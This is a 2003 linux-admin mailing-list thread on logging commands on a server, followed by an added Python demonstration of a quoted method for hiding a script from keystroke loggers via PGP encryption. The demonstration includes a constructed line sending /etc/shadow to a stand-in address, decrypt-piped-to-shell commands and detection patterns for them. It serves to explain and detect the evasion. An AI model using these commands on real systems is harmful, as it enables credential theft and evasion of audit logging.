From: Saint Neon <neo_chanakya@yahoo.com>
To: Glynn Clements <glynn.clements@virgin.net>
Cc: linux-admin@vger.kernel.org
Subject: Re: critical server commands logging
Date: Sat, 11 Jan 2003 21:29:02 -0800 (PST)
Message-ID: <20030112052902.40492.qmail@web40812.mail.yahoo.com>
In-Reply-To: <15904.33994.285524.349582@cerise.nosuchdomain.co.uk>
This is somewhat unconventional, but works.
You could run sniffer programs on your server, without too
many worries about load.
sniffit is a good program. You can find it here:
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
You can specify the host connections that you want to
log. The configuration file packs lots of punch and
power into it.
Neon.
--- Glynn Clements <glynn.clements@virgin.net> wrote:
>
> urgrue wrote:
>
> > There was some kind of "virtual tty" program, it might even have been a
> > kernel patch.
> > If I remember correctly it allows you to capture every keystroke and even
> > screen output.
> > I'm sorry I don't remember the name, maybe someone else does.
>
> Probably ttysnoop and/or telnetsnoopd (a "snooping" version of telnetd).
>
> However, this will only get you so far. Someone who is actively trying
> to do something malicious without getting caught can find a way around
> almost any logging mechanism which you install.
>
> E.g. logging the telnet/ssh connection can be circumvented by the
> following method:
>
> 1. Log in.
> 2. Generate a PGP key-pair.
> 3. Display the public key (i.e. send it back to the client).
> 4. Send a script which has been encrypted with the public key.
> 5. Decrypt the script.
> 6. Execute the script.
> 7. Delete the PGP key-pair.
>
> As the private key is never sent over the connection, you have no way
> of seeing what's in the script.
>
> If you think that the above would look suspicious, bear in mind that
> there are a great many ways in which the process can be obfuscated.
>
> Consider the situation where the user creates a text file (e.g. a
> script) by using a text editor (e.g. vi) interactively; deducing the
> exact contents of the file by examining the keystrokes which are
> logged is far from trivial.
>
> --
> Glynn Clements <glynn.clements@virgin.net>
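The seven-step procedure in the quoted message, played through as an added example; this is not code from the thread or from any of its authors. Standard-library Python stands in for gpg (textbook RSA wrapping a SHA-256 keystream, an assumption made for the demonstration and not how PGP actually formats messages); the transcript is what a ttysnoop-style keystroke-plus-screen logger would record; the command strings, file names and payload are constructed. A small review heuristic at the end shows what a log reviewer can still flag even though the script itself never appears in the clear.

```python
import hashlib
import re
import secrets


def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin; good enough for generating the stand-in key-pair."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def rsa_keypair(bits: int = 512):
    """Textbook RSA, returns ((n, e), (n, d)); stands in for 'gpg --gen-key'."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:      # e is prime, so this is gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """SHA-256 counter-mode stream; the symmetric layer of the message."""
    out = bytearray()
    for off in range(0, len(data), 32):
        pad = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[off:off + 32], pad))
    return bytes(out)


def run_evasion_session(script: bytes):
    """Plays the seven steps.  Returns (log, executed): `log` is what the
    logger records (KEY = keystrokes, OUT = screen output), `executed` is
    what the shell on the server actually ran.  The command strings are
    what an attacker using gpg would type (assumed); the arithmetic
    underneath is the stdlib stand-in for gpg."""
    log = ["KEY gpg --gen-key"]                               # step 2
    pub, priv = rsa_keypair()
    log.append("KEY gpg --export --armor")                    # step 3
    log.append(f"OUT -----BEGIN PGP PUBLIC KEY BLOCK----- {pub[0]:x} {pub[1]:x}")
    # Client side: only the public key ever reached the client.
    session_key = secrets.token_bytes(32)
    wrapped = pow(int.from_bytes(session_key, "big"), pub[1], pub[0])
    body = keystream_xor(session_key, script)
    log.append("KEY cat > payload.asc")                       # step 4
    log.append(f"KEY -----BEGIN PGP MESSAGE----- {wrapped:x} {body.hex()}")
    log.append("KEY gpg --decrypt payload.asc | sh")          # steps 5 and 6
    recovered = pow(wrapped, priv[1], priv[0]).to_bytes(32, "big")
    executed = keystream_xor(recovered, body)
    log.append("KEY rm -rf ~/.gnupg payload.asc")             # step 7
    return log, executed


def plaintext_in_log(log, script: bytes) -> bool:
    """The question a log reviewer asks: is the script visible anywhere?"""
    needle = script.decode()
    return any(needle in line for line in log)


SIGNALS = {                     # review heuristic for the pattern above
    "keygen": r"gpg .*--gen-key",
    "paste": r"BEGIN PGP MESSAGE",
    "decrypt_to_shell": r"gpg .*--decrypt.*\|\s*(sh|bash)\b",
    "cleanup": r"rm .*\.gnupg",
}


def flag_suspicious(log) -> list:
    """Names of the signals present; all four in one session is worth a
    look, though (as the post says) each step can be obfuscated."""
    return [name for name, pat in SIGNALS.items()
            if any(re.search(pat, line) for line in log)]


if __name__ == "__main__":
    payload = b"tar czf - /etc/shadow | mail evil@example.net"   # constructed
    log, ran = run_evasion_session(payload)
    print("\n".join(log))
    print("executed:", ran.decode())
    print("script visible to logger:", plaintext_in_log(log, payload))
    print("signals:", flag_suspicious(log))
```

Running it prints the transcript the logger would hold: the key generation command, an armoured public key on the screen, a pasted ciphertext blob, the decrypt-and-pipe-to-shell command and the cleanup, but never the script text. The heuristic only works while the attacker uses recognisable commands; rename gpg, split the paste across several files, or type the script into vi as Glynn notes, and the signals disappear while the log stays just as opaque.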